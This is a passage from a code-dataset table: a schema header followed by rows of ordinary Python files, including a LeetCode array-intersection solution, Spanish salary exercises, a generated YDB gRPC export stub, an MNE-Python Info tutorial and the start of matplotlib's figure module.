blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bd63b8e1ecf45c334724bc34debf628114b3047e | f734a39a0c37186e90caea597f13000823c9e67a | /leetcode/Hash Table/1213. Intersection of Three Sorted Arrays.py | 658d6de9e6d97a5ad69bbe7071633e6fde37a8e0 | [
"MIT"
] | permissive | yanshengjia/algorithm | 681746e0371a82860e64a279bfe4c83545469641 | 46caaf74aeab8af74861fb5b249eb4169baf8493 | refs/heads/master | 2022-08-02T20:15:57.927418 | 2022-07-17T14:43:51 | 2022-07-17T14:43:51 | 192,160,418 | 69 | 32 | null | null | null | null | UTF-8 | Python | false | false | 1,006 | py | """
Given three integer arrays arr1, arr2 and arr3 sorted in strictly increasing order, return a sorted array of only the integers that appeared in all three arrays.
Example 1:
Input: arr1 = [1,2,3,4,5], arr2 = [1,2,5,7,9], arr3 = [1,3,4,5,8]
Output: [1,5]
Explanation: Only 1 and 5 appeared in the three arrays.
Solution:
Use Hashtable to record the frequency of numbers, a number in intersection should have the frequency of 3
"""
# Time: O(m+n+q), where m, n, q are the lengths of the 3 arrays
# Space: O(x), where x is the size of the intersection
class Solution:
    def arraysIntersection(self, arr1: List[int], arr2: List[int], arr3: List[int]) -> List[int]:
        """Return the sorted list of values present in all three arrays.

        Each input is strictly increasing, so a value can appear at most
        once per array; a total count of 3 therefore means the value is
        present in every array.
        """
        counts = dict()
        for arr in (arr1, arr2, arr3):
            for value in arr:
                counts[value] = counts.get(value, 0) + 1
        result = [value for value, freq in counts.items() if freq == 3]
        result.sort()
        return result
| [
"[email protected]"
] | |
7c2d99114b3aafbeb624eb534da25400a8ae4e87 | 06c1d6bcd099bf1c25abb52ba07351b068d1ab16 | /Unidad_3/leccion_3.py | 7c26b82dce0e0e918ab604fafd4e3dc5a427c8aa | [] | no_license | dafnemus/python-curso-udemy | 1105e5f51980d6f5ec32dac338ebc340250c6384 | 493717fb321b24bd5abcadb8e27d25d68b4f12f8 | refs/heads/main | 2023-03-09T12:27:41.934087 | 2021-02-24T18:34:56 | 2021-02-24T18:34:56 | 337,728,568 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,638 | py | # pylint: disable=missing-docstring
# 1. Aplica un incremento de sueldo del 8% al salario de un trabajador.
# Para ello, recuerda que primero debes solicitar el monto base del salario.
def incrementar_sueldo(sueldo):
    """Print the salary after applying a flat 8% raise."""
    tasa = 0.08
    aumento = sueldo * tasa
    total = sueldo + aumento
    print(f'Total sueldo:{total}', end=' ')
    print(f'incremento: {aumento}')


incrementar_sueldo(2000)
print()
# 2. Aplica un incremento de sueldo del 8% al salario de un trabajador,
# solo si este gana menos que el salario mínimo
# (escoge cualquier valor para el salario mínimo, porejemplo 1000).
# Si el trabajador gana más que el salario mínimo, el incremento es del 5%
def incrementar_sueldo_2(sueldo):
    """Print the salary with an 8% raise at/below the minimum wage, else 5%."""
    SUELDO_MINIMO = 1000
    # 8% for salaries at or below the minimum, 5% above it.
    tasa = 0.08 if sueldo <= SUELDO_MINIMO else 0.05
    aumento = sueldo * tasa
    total = sueldo + aumento
    print(f'Total sueldo:{total}', end=' ')
    print(f'incremento: {aumento}')


incrementar_sueldo_2(800)
incrementar_sueldo_2(2000)
print()
# 3. Dado un valor que representa una cantidad en segundos,
# indica su equivalente en minutos, horas y días.
def convertir_segundos(segundos):
    """Print the equivalent of *segundos* in hours, minutes and days."""
    SEGUNDOS_POR_MINUTO = 60
    SEGUNDOS_POR_HORA = 3600
    SEGUNDOS_POR_DIA = 86400
    print(f'segundos {segundos}')
    print(f'segundos a hora: {segundos / SEGUNDOS_POR_HORA}')
    print(f'segundos a minutos: {segundos / SEGUNDOS_POR_MINUTO}')
    # Bug fix: the original message read 'segundosa dias:' (missing space).
    print(f'segundos a dias: {segundos / SEGUNDOS_POR_DIA}')


convertir_segundos(87600)
print()
# 4. Determinar el mínimo de 3 valores solicitados. Ahora, con 4 valores.
# Shared accumulator for the values whose minimum is reported.
lista_valores = []


def agregar_valor(valor):
    """Append *valor* to the shared list of values."""
    lista_valores.append(valor)


def minimo():
    """Print the stored values and, for at most 4 of them, their minimum."""
    print(f'valores: {lista_valores}')
    if len(lista_valores) > 4:
        return
    print(f'valor minimo: {min(lista_valores)}')


for numero in (2, 8, 3):
    agregar_valor(numero)
minimo()
print()
# 5. Solicita al usuario, un número mayor que cero y menor a un millón,
# determina si el número de dígitos de dicho valor.
# Así, si el valor ingresado es 3, entonces el resultado será 1.
# Del mismo modo, si el valor ingresado es 768590, el resultado será 6
def contar_digitos(numero):
    """Print how many digits *numero* has, for 0 < numero < 1,000,000."""
    if not 0 < numero < 1000000:
        # Out of range: stay silent, like the original guard.
        return
    cantidad = len(str(numero))
    print(f'el numero {numero} tiene {cantidad} digitos')


contar_digitos(22)
| [
"[email protected]"
] | |
19c1083ddebaae8a8cafbbfcbc4f663167f858b0 | 79fa6f3a9c0c07b2768b5c67d48cd2d3ada921c7 | /kikimr/public/api/grpc/ydb_export_v1_pb2.py | 8b1ed589a3769c3321e6a8c3913604b83594a9b6 | [
"Apache-2.0"
] | permissive | clumpytuna/ydb-python-sdk | 8dd951a532045587fcba1d541b3fb8798c358318 | f09d8db19f62032738ed77dabb3672c3e0f86cc3 | refs/heads/master | 2023-06-09T22:38:29.747969 | 2021-06-30T08:09:14 | 2021-06-30T08:09:14 | 319,103,389 | 0 | 0 | NOASSERTION | 2020-12-06T18:32:35 | 2020-12-06T18:32:34 | null | UTF-8 | Python | false | true | 2,581 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: kikimr/public/api/grpc/ydb_export_v1.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from kikimr.public.api.protos import ydb_export_pb2 as kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2
# NOTE(review): this module is protoc-generated ("DO NOT EDIT" in the file
# header); any manual change here will be lost on the next regeneration.
# File descriptor for ydb_export_v1.proto (package Ydb.Export.V1).
DESCRIPTOR = _descriptor.FileDescriptor(
  name='kikimr/public/api/grpc/ydb_export_v1.proto',
  package='Ydb.Export.V1',
  syntax='proto3',
  serialized_pb=_b('\n*kikimr/public/api/grpc/ydb_export_v1.proto\x12\rYdb.Export.V1\x1a)kikimr/public/api/protos/ydb_export.proto2\xa9\x01\n\rExportService\x12K\n\nExportToYt\x12\x1d.Ydb.Export.ExportToYtRequest\x1a\x1e.Ydb.Export.ExportToYtResponse\x12K\n\nExportToS3\x12\x1d.Ydb.Export.ExportToS3Request\x1a\x1e.Ydb.Export.ExportToS3ResponseB\x1a\n\x18\x63om.yandex.ydb.export.v1b\x06proto3')
  ,
  dependencies=[kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# File-level options (here: the Java package name for generated code).
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\030com.yandex.ydb.export.v1'))

# Service descriptor for ExportService with its two unary RPC methods,
# ExportToYt and ExportToS3.
_EXPORTSERVICE = _descriptor.ServiceDescriptor(
  name='ExportService',
  full_name='Ydb.Export.V1.ExportService',
  file=DESCRIPTOR,
  index=0,
  options=None,
  serialized_start=105,
  serialized_end=274,
  methods=[
  _descriptor.MethodDescriptor(
    name='ExportToYt',
    full_name='Ydb.Export.V1.ExportService.ExportToYt',
    index=0,
    containing_service=None,
    input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTREQUEST,
    output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOYTRESPONSE,
    options=None,
  ),
  _descriptor.MethodDescriptor(
    name='ExportToS3',
    full_name='Ydb.Export.V1.ExportService.ExportToS3',
    index=1,
    containing_service=None,
    input_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3REQUEST,
    output_type=kikimr_dot_public_dot_api_dot_protos_dot_ydb__export__pb2._EXPORTTOS3RESPONSE,
    options=None,
  ),
])
_sym_db.RegisterServiceDescriptor(_EXPORTSERVICE)

DESCRIPTOR.services_by_name['ExportService'] = _EXPORTSERVICE

# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
f18aa97b5ffc96f15248cad15ddee3ba1135c971 | 4a36b5979b0753b32cff3956fd97fb8ed8b11e84 | /0.22/_downloads/aaf6e18611e50c34953a2674b6489a9c/plot_30_info.py | 6f27946faf6e543cadc3b69272928b6c607cd2ee | [] | permissive | mne-tools/mne-tools.github.io | 8aac7ae10bf2faeeb875b9a351a5530dc0e53154 | 495e878adc1ef3374e3db88604504d7542b01194 | refs/heads/main | 2023-09-03T07:06:00.660557 | 2023-09-03T04:10:18 | 2023-09-03T04:10:18 | 35,639,371 | 12 | 16 | BSD-3-Clause | 2023-05-05T19:04:32 | 2015-05-14T22:04:23 | HTML | UTF-8 | Python | false | false | 8,689 | py | # -*- coding: utf-8 -*-
"""
.. _tut-info-class:
The Info data structure
=======================
This tutorial describes the :class:`mne.Info` data structure, which keeps track
of various recording details, and is attached to :class:`~mne.io.Raw`,
:class:`~mne.Epochs`, and :class:`~mne.Evoked` objects.
.. contents:: Page contents
:local:
:depth: 2
We'll begin by loading the Python modules we need, and loading the same
:ref:`example data <sample-dataset>` we used in the :ref:`introductory tutorial
<tut-overview>`:
"""
import os

import mne

# Download (if not already cached) and locate the MNE sample dataset, then
# lazily open the band-pass-filtered (0-40 Hz) audiovisual recording.
sample_data_folder = mne.datasets.sample.data_path()
sample_data_raw_file = os.path.join(sample_data_folder, 'MEG', 'sample',
                                    'sample_audvis_filt-0-40_raw.fif')
raw = mne.io.read_raw_fif(sample_data_raw_file)
###############################################################################
# As seen in the :ref:`introductory tutorial <tut-overview>`, when a
# :class:`~mne.io.Raw` object is loaded, an :class:`~mne.Info` object is
# created automatically, and stored in the ``raw.info`` attribute:
# The Info object was created automatically when the Raw file was loaded.
print(raw.info)
###############################################################################
# However, it is not strictly necessary to load the :class:`~mne.io.Raw` object
# in order to view or edit the :class:`~mne.Info` object; you can extract all
# the relevant information into a stand-alone :class:`~mne.Info` object using
# :func:`mne.io.read_info`:
# Read just the measurement info, without loading the Raw data itself.
info = mne.io.read_info(sample_data_raw_file)
print(info)
###############################################################################
# As you can see, the :class:`~mne.Info` object keeps track of a lot of
# information about:
#
# - the recording system (gantry angle, HPI details, sensor digitizations,
# channel names, ...)
# - the experiment (project name and ID, subject information, recording date,
# experimenter name or ID, ...)
# - the data (sampling frequency, applied filter frequencies, bad channels,
# projectors, ...)
#
# The complete list of fields is given in :class:`the API documentation
# <mne.Info>`.
#
#
# Querying the ``Info`` object
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# The fields in a :class:`~mne.Info` object act like Python :class:`dictionary
# <dict>` keys, using square brackets and strings to access the contents of a
# field:
# Info fields act like dict keys: list them, then look one field up.
print(info.keys())
print()  # insert a blank line
print(info['ch_names'])
###############################################################################
# Most of the fields contain :class:`int`, :class:`float`, or :class:`list`
# data, but the ``chs`` field bears special mention: it contains a list of
# dictionaries (one :class:`dict` per channel) containing everything there is
# to know about a channel other than the data it recorded. Normally it is not
# necessary to dig into the details of the ``chs`` field — various MNE-Python
# functions can extract the information more cleanly than iterating over the
# list of dicts yourself — but it can be helpful to know what is in there. Here
# we show the keys for the first channel's :class:`dict`:
# Each entry of info['chs'] is a dict of per-channel metadata.
print(info['chs'][0].keys())
###############################################################################
# .. _picking_channels:
#
# Obtaining subsets of channels
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# It is often useful to convert between channel names and the integer indices
# identifying rows of the data array where those channels' measurements are
# stored. The :class:`~mne.Info` object is useful for this task; two
# convenience functions that rely on the :class:`mne.Info` object for picking
# channels are :func:`mne.pick_channels` and :func:`mne.pick_types`.
# :func:`~mne.pick_channels` minimally takes a list of all channel names and a
# list of channel names to include; it is also possible to provide an empty
# list to ``include`` and specify which channels to ``exclude`` instead:
# Select indices by an explicit include list, or by excluding from all.
print(mne.pick_channels(info['ch_names'], include=['MEG 0312', 'EEG 005']))
print(mne.pick_channels(info['ch_names'], include=[],
                        exclude=['MEG 0312', 'EEG 005']))
###############################################################################
# :func:`~mne.pick_types` works differently, since channel type cannot always
# be reliably determined from channel name alone. Consequently,
# :func:`~mne.pick_types` needs an :class:`~mne.Info` object instead of just a
# list of channel names, and has boolean keyword arguments for each channel
# type. Default behavior is to pick only MEG channels (and MEG reference
# channels if present) and exclude any channels already marked as "bad" in the
# ``bads`` field of the :class:`~mne.Info` object. Therefore, to get *all* and
# *only* the EEG channel indices (including the "bad" EEG channels) we must
# pass ``meg=False`` and ``exclude=[]``:
# All EEG channel indices, including channels listed in info['bads'].
print(mne.pick_types(info, meg=False, eeg=True, exclude=[]))
###############################################################################
# Note that the ``meg`` and ``fnirs`` parameters of :func:`~mne.pick_types`
# accept strings as well as boolean values, to allow selecting only
# magnetometer or gradiometer channels (via ``meg='mag'`` or ``meg='grad'``) or
# to pick only oxyhemoglobin or deoxyhemoglobin channels (via ``fnirs='hbo'``
# or ``fnirs='hbr'``, respectively).
#
# A third way to pick channels from an :class:`~mne.Info` object is to apply
# `regular expression`_ matching to the channel names using
# :func:`mne.pick_channels_regexp`. Here the ``^`` represents the beginning of
# the string and ``.`` character matches any single character, so both EEG and
# EOG channels will be selected:
# '^E.G' matches names starting with EEG or EOG ('.' = any one character).
print(mne.pick_channels_regexp(info['ch_names'], '^E.G'))
###############################################################################
# :func:`~mne.pick_channels_regexp` can be especially useful for channels named
# according to the `10-20 <ten-twenty_>`_ system (e.g., to select all channels
# ending in "z" to get the midline, or all channels beginning with "O" to get
# the occipital channels). Note that :func:`~mne.pick_channels_regexp` uses the
# Python standard module :mod:`re` to perform regular expression matching; see
# the documentation of the :mod:`re` module for implementation details.
#
# .. warning::
# Both :func:`~mne.pick_channels` and :func:`~mne.pick_channels_regexp`
# operate on lists of channel names, so they are unaware of which channels
# (if any) have been marked as "bad" in ``info['bads']``. Use caution to
# avoid accidentally selecting bad channels.
#
#
# Obtaining channel type information
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# Sometimes it can be useful to know channel type based on its index in the
# data array. For this case, use :func:`mne.channel_type`, which takes
# an :class:`~mne.Info` object and a single integer channel index:
# Channel type of the channel stored at row 25 of the data array.
print(mne.channel_type(info, 25))
###############################################################################
# To obtain several channel types at once, you could embed
# :func:`~mne.channel_type` in a :term:`list comprehension`, or use the
# :meth:`~mne.io.Raw.get_channel_types` method of a :class:`~mne.io.Raw`,
# :class:`~mne.Epochs`, or :class:`~mne.Evoked` instance:
# Query several channel types at once, two equivalent ways.
picks = (25, 76, 77, 319)
print([mne.channel_type(info, x) for x in picks])
print(raw.get_channel_types(picks=picks))
###############################################################################
# Alternatively, you can get the indices of all channels of *all* channel types
# present in the data, using :func:`~mne.channel_indices_by_type`,
# which returns a :class:`dict` with channel types as keys, and lists of
# channel indices as values:
# Map each channel type present in the data to its list of channel indices.
ch_idx_by_type = mne.channel_indices_by_type(info)
print(ch_idx_by_type.keys())
print(ch_idx_by_type['eog'])
###############################################################################
# Dropping channels from an ``Info`` object
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If you want to modify an :class:`~mne.Info` object by eliminating some of the
# channels in it, you can use the :func:`mne.pick_info` function to pick the
# channels you want to keep and omit the rest:
# Keep only the EEG channels; note the reduced channel count afterwards.
print(info['nchan'])
eeg_indices = mne.pick_types(info, meg=False, eeg=True)
print(mne.pick_info(info, eeg_indices)['nchan'])
###############################################################################
# By default, :func:`~mne.pick_info` will make a copy of the original
# :class:`~mne.Info` object before modifying it; if you want to modify it
# in-place, include the parameter ``copy=False``.
#
#
# .. LINKS
#
# .. _`regular expression`: https://en.wikipedia.org/wiki/Regular_expression
# .. _`ten-twenty`: https://en.wikipedia.org/wiki/10%E2%80%9320_system_(EEG)
| [
"[email protected]"
] | |
1692e595b877b44d05dbf5b3b8052e97d5d06780 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/matplotlib/2019/8/figure.py | 4e0cc02f9b055f7b8ac7ab105f45c733614451a0 | [] | no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 101,029 | py | """
The figure module provides the top-level
:class:`~matplotlib.artist.Artist`, the :class:`Figure`, which
contains all the plot elements. The following classes are defined
:class:`SubplotParams`
control the default spacing of the subplots
:class:`Figure`
Top level container for all plot elements.
"""
import logging
from numbers import Integral
import numpy as np
from matplotlib import rcParams
from matplotlib import backends, docstring, projections
from matplotlib import __version__ as _mpl_version
from matplotlib import get_backend
import matplotlib.artist as martist
from matplotlib.artist import Artist, allow_rasterization
from matplotlib.backend_bases import FigureCanvasBase
import matplotlib.cbook as cbook
import matplotlib.colorbar as cbar
import matplotlib.image as mimage
from matplotlib.axes import Axes, SubplotBase, subplot_class_factory
from matplotlib.blocking_input import BlockingMouseInput, BlockingKeyMouseInput
from matplotlib.gridspec import GridSpec
import matplotlib.legend as mlegend
from matplotlib.patches import Rectangle
from matplotlib.projections import (get_projection_names,
process_projection_requirements)
from matplotlib.text import Text, TextWithDash
from matplotlib.transforms import (Affine2D, Bbox, BboxTransformTo,
TransformedBbox)
import matplotlib._layoutbox as layoutbox
from matplotlib.backend_bases import NonGuiException
_log = logging.getLogger(__name__)
docstring.interpd.update(projection_names=get_projection_names())
def _stale_figure_callback(self, val):
if self.figure:
self.figure.stale = val
class _AxesStack(cbook.Stack):
    """
    Specialization of the `.Stack` to handle all tracking of
    `~matplotlib.axes.Axes` in a `.Figure`.

    This stack stores ``key, (ind, axes)`` pairs, where:

    * **key** should be a hash of the args and kwargs
      used in generating the Axes.
    * **ind** is a serial number for tracking the order
      in which axes were added.

    The AxesStack is a callable, where ``ax_stack()`` returns
    the current axes. Alternatively the :meth:`current_key_axes` will
    return the current key and associated axes.
    """

    def __init__(self):
        super().__init__()
        # Serial counter, incremented on every successful add(), so entries
        # can be ordered by insertion time.
        self._ind = 0

    def as_list(self):
        """
        Return a list of the Axes instances that have been added to the figure.
        """
        # Sorting the (ind, axes) pairs restores insertion order; the
        # serial numbers are unique, so the axes are never compared.
        ia_list = [a for k, a in self._elements]
        ia_list.sort()
        return [a for i, a in ia_list]

    def get(self, key):
        """
        Return the Axes instance that was added with *key*.

        If it is not present, return *None*.
        """
        item = dict(self._elements).get(key)
        if item is None:
            return None
        # Reaching this point means a caller re-used the args/kwargs of an
        # existing axes; that reuse behavior is deprecated.
        cbook.warn_deprecated(
            "2.1",
            message="Adding an axes using the same arguments as a previous "
            "axes currently reuses the earlier instance. In a future "
            "version, a new instance will always be created and returned. "
            "Meanwhile, this warning can be suppressed, and the future "
            "behavior ensured, by passing a unique label to each axes "
            "instance.")
        return item[1]

    def _entry_from_axes(self, e):
        # Recover the full ``(key, (ind, axes))`` stack entry for axes *e*
        # by inverting the stored elements.
        ind, k = {a: (ind, k) for k, (ind, a) in self._elements}[e]
        return (k, (ind, e))

    def remove(self, a):
        """Remove the axes from the stack."""
        super().remove(self._entry_from_axes(a))

    def bubble(self, a):
        """
        Move the given axes, which must already exist in the
        stack, to the top.
        """
        return super().bubble(self._entry_from_axes(a))

    def add(self, key, a):
        """
        Add Axes *a*, with key *key*, to the stack, and return the stack.

        If *key* is unhashable, replace it by a unique, arbitrary object.

        If *a* is already on the stack, don't add it again, but
        return *None*.
        """
        # All the error checking may be unnecessary; but this method
        # is called so seldom that the overhead is negligible.
        cbook._check_isinstance(Axes, a=a)
        try:
            hash(key)
        except TypeError:
            # Unhashable key: substitute a fresh object, unique by identity.
            key = object()

        a_existing = self.get(key)
        if a_existing is not None:
            super().remove((key, a_existing))
            cbook._warn_external(
                "key {!r} already existed; Axes is being replaced".format(key))
            # I don't think the above should ever happen.

        if a in self:
            return None
        self._ind += 1
        return super().push((key, (self._ind, a)))

    def current_key_axes(self):
        """
        Return a tuple of ``(key, axes)`` for the active axes.

        If no axes exists on the stack, then returns ``(None, None)``.
        """
        if not len(self._elements):
            # ``_default`` comes from the `.Stack` base class.
            return self._default, self._default
        else:
            key, (index, axes) = self._elements[self._pos]
            return key, axes

    def __call__(self):
        # Calling the stack returns the current axes (or the default).
        return self.current_key_axes()[1]

    def __contains__(self, a):
        return a in self.as_list()
@cbook.deprecated("3.2")
class AxesStack(_AxesStack):
    # Deprecated public alias of `_AxesStack`, kept only for backward
    # compatibility; internal code should use `_AxesStack` directly.
    pass
class SubplotParams:
    """
    A class to hold the parameters for a subplot.
    """

    def __init__(self, left=None, bottom=None, right=None, top=None,
                 wspace=None, hspace=None):
        """
        All dimensions are fractions of the figure width or height.
        Defaults are given by :rc:`figure.subplot.[name]`.

        Parameters
        ----------
        left : float
            The left side of the subplots of the figure.
        right : float
            The right side of the subplots of the figure.
        bottom : float
            The bottom of the subplots of the figure.
        top : float
            The top of the subplots of the figure.
        wspace : float
            The amount of width reserved for space between subplots,
            expressed as a fraction of the average axis width.
        hspace : float
            The amount of height reserved for space between subplots,
            expressed as a fraction of the average axis height.
        """
        self.validate = True
        self.update(left, bottom, right, top, wspace, hspace)

    def update(self, left=None, bottom=None, right=None, top=None,
               wspace=None, hspace=None):
        """
        Update the dimensions of the passed parameters. *None* means unchanged.
        """
        names = ('left', 'bottom', 'right', 'top', 'wspace', 'hspace')
        new_values = (left, bottom, right, top, wspace, hspace)
        # Snapshot the current values so a failed validation can roll back.
        snapshot = {name: getattr(self, name, None) for name in names}

        for name, value in zip(names, new_values):
            self._update_this(name, value)

        if self.validate:
            if self.left >= self.right:
                self._restore(snapshot)
                raise ValueError('left cannot be >= right')
            if self.bottom >= self.top:
                self._restore(snapshot)
                raise ValueError('bottom cannot be >= top')

    def _restore(self, snapshot):
        # Re-apply a previously captured set of attribute values.
        for name, value in snapshot.items():
            setattr(self, name, value)

    def _update_this(self, s, val):
        # Resolution order: explicit value -> existing attribute -> rcParams.
        if val is None:
            val = getattr(self, s, None)
        if val is None:
            val = rcParams['figure.subplot.' + s]
        setattr(self, s, val)
class Figure(Artist):
"""
The top level container for all the plot elements.
The Figure instance supports callbacks through a *callbacks* attribute
which is a `.CallbackRegistry` instance. The events you can connect to
are 'dpi_changed', and the callback will be called with ``func(fig)`` where
fig is the `Figure` instance.
Attributes
----------
patch
The `.Rectangle` instance representing the figure background patch.
suppressComposite
For multiple figure images, the figure will make composite images
depending on the renderer option_image_nocomposite function. If
*suppressComposite* is a boolean, this will override the renderer.
"""
def __str__(self):
return "Figure(%gx%g)" % tuple(self.bbox.size)
def __repr__(self):
return "<{clsname} size {h:g}x{w:g} with {naxes} Axes>".format(
clsname=self.__class__.__name__,
h=self.bbox.size[0], w=self.bbox.size[1],
naxes=len(self.axes),
)
    def __init__(self,
                 figsize=None,
                 dpi=None,
                 facecolor=None,
                 edgecolor=None,
                 linewidth=0.0,
                 frameon=None,
                 subplotpars=None,  # default to rc
                 tight_layout=None,  # default to rc figure.autolayout
                 constrained_layout=None,  # default to rc
                                           # figure.constrained_layout.use
                 ):
        """
        Parameters
        ----------
        figsize : 2-tuple of floats, default: :rc:`figure.figsize`
            Figure dimension ``(width, height)`` in inches.

        dpi : float, default: :rc:`figure.dpi`
            Dots per inch.

        facecolor : default: :rc:`figure.facecolor`
            The figure patch facecolor.

        edgecolor : default: :rc:`figure.edgecolor`
            The figure patch edge color.

        linewidth : float
            The linewidth of the frame (i.e. the edge linewidth of the figure
            patch).

        frameon : bool, default: :rc:`figure.frameon`
            If ``False``, suppress drawing the figure background patch.

        subplotpars : :class:`SubplotParams`
            Subplot parameters. If not given, the default subplot
            parameters :rc:`figure.subplot.*` are used.

        tight_layout : bool or dict, default: :rc:`figure.autolayout`
            If ``False`` use *subplotpars*. If ``True`` adjust subplot
            parameters using `.tight_layout` with default padding.
            When providing a dict containing the keys ``pad``, ``w_pad``,
            ``h_pad``, and ``rect``, the default `.tight_layout` paddings
            will be overridden.

        constrained_layout : bool
            If ``True`` use constrained layout to adjust positioning of plot
            elements. Like ``tight_layout``, but designed to be more
            flexible. See
            :doc:`/tutorials/intermediate/constrainedlayout_guide`
            for examples. (Note: does not work with :meth:`.subplot` or
            :meth:`.subplot2grid`.)
            Defaults to :rc:`figure.constrained_layout.use`.
        """
        super().__init__()
        # remove the non-figure artist _axes property
        # as it makes no sense for a figure to be _in_ an axes
        # this is used by the property methods in the artist base class
        # which are over-ridden in this class
        del self._axes
        self.callbacks = cbook.CallbackRegistry()

        # Fall back to rcParams for every appearance option left unset.
        if figsize is None:
            figsize = rcParams['figure.figsize']
        if dpi is None:
            dpi = rcParams['figure.dpi']
        if facecolor is None:
            facecolor = rcParams['figure.facecolor']
        if edgecolor is None:
            edgecolor = rcParams['figure.edgecolor']
        if frameon is None:
            frameon = rcParams['figure.frameon']

        if not np.isfinite(figsize).all() or (np.array(figsize) <= 0).any():
            raise ValueError('figure size must be positive finite not '
                             f'{figsize}')
        self.bbox_inches = Bbox.from_bounds(0, 0, *figsize)

        self.dpi_scale_trans = Affine2D().scale(dpi)
        # Bypass the ``dpi`` property setter here: assigning through the
        # property would trigger a resize and a 'dpi_changed' callback.
        self._dpi = dpi
        self.bbox = TransformedBbox(self.bbox_inches, self.dpi_scale_trans)

        self.transFigure = BboxTransformTo(self.bbox)

        self.patch = Rectangle(
            xy=(0, 0), width=1, height=1, visible=frameon,
            facecolor=facecolor, edgecolor=edgecolor, linewidth=linewidth,
            # Don't let the figure patch influence bbox calculation.
            in_layout=False)
        self._set_artist_props(self.patch)
        self.patch.set_antialiased(False)

        FigureCanvasBase(self)  # Set self.canvas.
        self._suptitle = None

        if subplotpars is None:
            subplotpars = SubplotParams()

        self.subplotpars = subplotpars
        # constrained_layout:
        self._layoutbox = None
        # set in set_constrained_layout_pads()
        self.set_constrained_layout(constrained_layout)

        self.set_tight_layout(tight_layout)

        self._axstack = _AxesStack()  # track all figure axes and current axes
        self.clf()
        self._cachedRenderer = None

        # groupers to keep track of x and y labels we want to align.
        # see self.align_xlabels and self.align_ylabels and
        # axis._get_tick_boxes_siblings
        self._align_xlabel_grp = cbook.Grouper()
        self._align_ylabel_grp = cbook.Grouper()

        # list of child gridspecs for this figure
        self._gridspecs = []
# TODO: I'd like to dynamically add the _repr_html_ method
# to the figure in the right context, but then IPython doesn't
# use it, for some reason.
def _repr_html_(self):
# We can't use "isinstance" here, because then we'd end up importing
# webagg unconditionally.
if 'WebAgg' in type(self.canvas).__name__:
from matplotlib.backends import backend_webagg
return backend_webagg.ipython_inline_display(self)
    def show(self, warn=True):
        """
        If using a GUI backend with pyplot, display the figure window.

        If the figure was not created using
        :func:`~matplotlib.pyplot.figure`, it will lack a
        :class:`~matplotlib.backend_bases.FigureManagerBase`, and
        will raise an AttributeError.

        .. warning::
            This does not manage an GUI event loop. Consequently, the figure
            may only be shown briefly or not shown at all if you or your
            environment are not managing an event loop.

            Proper use cases for `.Figure.show` include running this from a
            GUI application or an IPython shell.

            If you're running a pure python shell or executing a non-GUI
            python script, you should use `matplotlib.pyplot.show` instead,
            which takes care of managing the event loop for you.

        Parameters
        ----------
        warn : bool
            If ``True`` and we are not running headless (i.e. on Linux with an
            unset DISPLAY), issue warning when called on a non-GUI backend.
        """
        try:
            manager = getattr(self.canvas, 'manager')
        except AttributeError as err:
            raise AttributeError("%s\n"
                                 "Figure.show works only "
                                 "for figures managed by pyplot, normally "
                                 "created by pyplot.figure()." % err)

        if manager is not None:
            try:
                manager.show()
                return
            except NonGuiException:
                # Manager exists but cannot show a window (non-GUI backend);
                # fall through to the warning logic below.
                pass
        if (backends._get_running_interactive_framework() != "headless"
                and warn):
            cbook._warn_external('Matplotlib is currently using %s, which is '
                                 'a non-GUI backend, so cannot show the '
                                 'figure.' % get_backend())
    def _get_axes(self):
        # Accessor backing the read-only ``axes`` property below.
        return self._axstack.as_list()

    axes = property(fget=_get_axes,
